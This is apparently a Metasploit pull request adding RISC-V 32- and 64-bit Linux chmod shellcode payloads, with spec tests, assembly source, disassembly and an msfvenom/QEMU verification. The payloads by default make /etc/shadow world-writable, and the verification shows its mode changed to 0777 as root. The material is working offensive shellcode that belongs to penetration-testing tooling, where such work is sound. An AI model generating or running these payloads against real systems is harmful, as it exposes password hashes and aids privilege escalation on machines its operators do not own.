### PR TITLE
Add Linux RISC-V chmod payloads

### DIFF
--- a/modules/payloads/singles/linux/riscv32le/chmod.rb
+++ b/modules/payloads/singles/linux/riscv32le/chmod.rb
@@ -1,0 +1,73 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  CachedSize = 52
+
+  include Msf::Payload::Single
+
+  def initialize(info = {})
+    super(
+      merge_info(
+        info,
+        'Name' => 'Linux Chmod',
+        'Description' => 'Runs chmod on the specified file with specified mode.',
+        'Author' => 'bcoles',
+        'License' => MSF_LICENSE,
+        'Platform' => 'linux',
+        'Arch' => ARCH_RISCV32LE,
+        'References' => [
+          ['URL', 'https://man7.org/linux/man-pages/man2/fchmodat.2.html'],
+          ['URL', 'https://github.com/bcoles/shellcode/blob/main/riscv32/chmod/chmod.s'],
+        ]
+      )
+    )
+    register_options([
+      OptString.new('FILE', [ true, 'Filename to chmod', '/etc/shadow' ]),
+      OptString.new('MODE', [ true, 'File mode (octal)', '0666' ]),
+    ])
+  end
+
+  # @return [String] the full path of the file to be modified
+  def file_path
+    datastore['FILE'] || ''
+  end
+
+  # @return [Integer] the desired mode for the file
+  def mode
+    (datastore['MODE'] || '0666').oct
+  rescue StandardError => e
+    raise ArgumentError, "Invalid chmod mode '#{datastore['MODE']}': #{e.message}"
+  end
+
+  # @return [Integer] RISC-V instruction to load mode into a2 register
+  # For example: 0x1ad00613 ; li a2,429 ; loads 429 (0o644) into a2
+  def chmod_instruction(mode)
+    (mode & 0xfff) << 20 | 0x0613
+  end
+
+  def generate(_opts = {})
+    raise ArgumentError, "chmod mode (#{mode}) is greater than maximum mode size (0x7FF)" if mode > 0x7FF
+
+    shellcode = [
+      0xf9c00513,  # li a0,-100
+      0x00000597,  # auipc a1,0x0
+      0x02458593,  # addi a1,a1,36 # 100a0 <path>
+      chmod_instruction(mode), # li a2,<mode>
+      0x00000693,  # li a3,0
+      0x03500893,  # li a7,53 # __NR_fchmodat
+      0x00000073,  # ecall
+      0x00000513,  # li a0,0
+      0x05d00893,  # li a7,93 # __NR_exit
+      0x00000073,  # ecall
+    ].pack('V*')
+    shellcode += file_path + "\x00"
+
+    # align our shellcode to 4 bytes
+    shellcode += "\x00" while shellcode.bytesize % 4 != 0
+
+    super.to_s + shellcode
+  end
+end

--- a/modules/payloads/singles/linux/riscv64le/chmod.rb
+++ b/modules/payloads/singles/linux/riscv64le/chmod.rb
@@ -1,0 +1,73 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  CachedSize = 52
+
+  include Msf::Payload::Single
+
+  def initialize(info = {})
+    super(
+      merge_info(
+        info,
+        'Name' => 'Linux Chmod',
+        'Description' => 'Runs chmod on the specified file with specified mode.',
+        'Author' => 'bcoles',
+        'License' => MSF_LICENSE,
+        'Platform' => 'linux',
+        'Arch' => ARCH_RISCV64LE,
+        'References' => [
+          ['URL', 'https://man7.org/linux/man-pages/man2/fchmodat.2.html'],
+          ['URL', 'https://github.com/bcoles/shellcode/blob/main/riscv64/chmod/chmod.s'],
+        ]
+      )
+    )
+    register_options([
+      OptString.new('FILE', [ true, 'Filename to chmod', '/etc/shadow' ]),
+      OptString.new('MODE', [ true, 'File mode (octal)', '0666' ]),
+    ])
+  end
+
+  # @return [String] the full path of the file to be modified
+  def file_path
+    datastore['FILE'] || ''
+  end
+
+  # @return [Integer] the desired mode for the file
+  def mode
+    (datastore['MODE'] || '0666').oct
+  rescue StandardError => e
+    raise ArgumentError, "Invalid chmod mode '#{datastore['MODE']}': #{e.message}"
+  end
+
+  # @return [Integer] RISC-V instruction to load mode into a2 register
+  # For example: 0x1ad00613 ; li a2,429 ; loads 429 (0o644) into a2
+  def chmod_instruction(mode)
+    (mode & 0xfff) << 20 | 0x0613
+  end
+
+  def generate(_opts = {})
+    raise ArgumentError, "chmod mode (#{mode}) is greater than maximum mode size (0x7FF)" if mode > 0x7FF
+
+    shellcode = [
+      0xf9c00513,  # li a0,-100
+      0x00000597,  # auipc a1,0x0
+      0x02458593,  # addi a1,a1,36 # 100a0 <path>
+      chmod_instruction(mode), # li a2,<mode>
+      0x00000693,  # li a3,0
+      0x03500893,  # li a7,53 # __NR_fchmodat
+      0x00000073,  # ecall
+      0x00000513,  # li a0,0
+      0x05d00893,  # li a7,93 # __NR_exit
+      0x00000073,  # ecall
+    ].pack('V*')
+    shellcode += file_path + "\x00"
+
+    # align our shellcode to 4 bytes
+    shellcode += "\x00" while shellcode.bytesize % 4 != 0
+
+    super.to_s + shellcode
+  end
+end

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -2055,6 +2055,16 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'linux/ppc64/shell_reverse_tcp'
   end
 
+  context 'linux/riscv32le/chmod' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/linux/riscv32le/chmod'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'linux/riscv32le/chmod'
+  end
+
   context 'linux/riscv32le/exec' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [
@@ -2073,6 +2083,16 @@ RSpec.describe 'modules/payloads', :content do
                           dynamic_size: false,
                           modules_pathname: modules_pathname,
                           reference_name: 'linux/riscv32le/reboot'
+  end
+
+  context 'linux/riscv64le/chmod' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/linux/riscv64le/chmod'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'linux/riscv64le/chmod'
   end
 
   context 'linux/riscv64le/exec' do


### PR DESCRIPTION
Add Linux RISC-V 32-bit / 64-bit Little Endian `chmod` payloads.

# Source

32-bit and 64-bit are identical.

`chmod.s`:

```asm
.global _start
.section .text

_start:
    # sys_fchmodat(int dfd, const char __user * filename, umode_t mode);
    # fchmodat(AT_FDCWD, "/tmp/test.txt", 0644, 0)
    li      a0, -100  # AT_FDCWD
    la      a1, path  # pointer to path
    li      a2, 0655  # mode
    li      a3, 0     # flags
    li      a7, 53    # __NR_fchmodat
    ecall

    li      a0, 0
    li      a7, 93    # __NR_exit
    ecall

path:
    .asciz "/tmp/test.txt"
```

# Build

```
$ cat build 
#!/bin/sh
/home/user/Desktop/musl-cross/riscv64-linux-musl-cross/bin/riscv64-linux-musl-as chmod.s -o chmod.o && \
/home/user/Desktop/musl-cross/riscv64-linux-musl-cross/bin/riscv64-linux-musl-ld chmod.o -o chmod --nostdlib --static && \
/home/user/Desktop/musl-cross/riscv64-linux-musl-cross/bin/riscv64-linux-musl-objdump -x chmod
```

```
$ /home/user/Desktop/musl-cross/riscv64-linux-musl-cross/bin/riscv64-linux-musl-objdump -d chmod

chmod:     file format elf64-littleriscv


Disassembly of section .text:

0000000000010078 <_start>:
   10078:	f9c00513          	li	a0,-100
   1007c:	00000597          	auipc	a1,0x0
   10080:	02458593          	addi	a1,a1,36 # 100a0 <path>
   10084:	1ad00613          	li	a2,429
   10088:	00000693          	li	a3,0
   1008c:	03500893          	li	a7,53
   10090:	00000073          	ecall
   10094:	00000513          	li	a0,0
   10098:	05d00893          	li	a7,93
   1009c:	00000073          	ecall

00000000000100a0 <path>:
   100a0:	706d742f          	0x706d742f
   100a4:	7365742f          	0x7365742f
   100a8:	2e74                	fld	fa3,216(a2)
   100aa:	7874                	ld	a3,240(s0)
   100ac:	0074                	addi	a3,sp,12
	...
```


# Verification

Tested with QEMU. For other test environments, see https://github.com/rapid7/metasploit-framework/pull/19518#issuecomment-2385330975.

Generate a Linux Chmod payload (with optional NOP sled):

```
./msfvenom -n 100 --format elf -p linux/riscv64le/chmod FILE="/etc/shadow" MODE="0777" > chmod.elf
```

Execute the payload with QEMU:

```
$ /home/user/qemu/build/qemu-riscv64 -strace ./chmod.elf ; ls -la /etc/shadow
22001 fchmodat(AT_FDCWD,"/etc/shadow",0777,0) = -1 errno=1 (Operation not permitted)
22001 exit(0)
-rw-r----- 1 root shadow 1874 Jan 24  2025 /etc/shadow
$ sudo /home/user/qemu/build/qemu-riscv64 -strace ./chmod.elf ; ls -la /etc/shadow
[sudo] password for user: 
22006 fchmodat(AT_FDCWD,"/etc/shadow",0777,0) = 0
22006 exit(0)
-rwxrwxrwx 1 root shadow 1874 Jan 24  2025 /etc/shadow
```

Note the payload was executed successfully and the file permissions were changed.

